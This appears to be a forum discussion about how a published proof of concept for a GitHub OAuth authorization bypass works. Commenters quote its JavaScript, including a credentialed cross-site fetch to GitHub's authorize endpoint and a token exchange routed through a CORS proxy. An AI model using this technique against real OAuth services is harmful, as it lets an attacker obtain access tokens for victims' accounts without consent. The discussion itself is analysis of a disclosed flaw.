
That would defeat the point because then the server would need to know your authentication cookie. I can’t see the PoC but I doubt this is how it works.



There was no proxy view-source:https://not-an-aardvark.github.io/oauth-bypass-poc-fbdf56605...

    const authUrl = `https://github.com/login/oauth/authorize?client_id=${CLIENT_ID}&scope=read:user&authorize=1`;
    fetch(
        authUrl,
        {
            method: 'HEAD',
            credentials: 'include',
            mode: 'no-cors'
        }
    )


There was a proxy, but I may have misunderstood what it was being used for

    fetch(
        // For the proof-of-concept, use a proxy to get around CORS. This is only necessary because the proof of concept runs
        // clientside in a browser; an alternative would be to just send the code to a server and do the request there.
        'https://cors-anywhere.herokuapp.com/https://github.com/login/oauth/access_token',
        {
            method: 'POST',
            mode: 'cors',
            headers: {
                Accept: 'application/json',
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                client_id: CLIENT_ID,
                client_secret: CLIENT_SECRET,
                code
            })
        }
    )



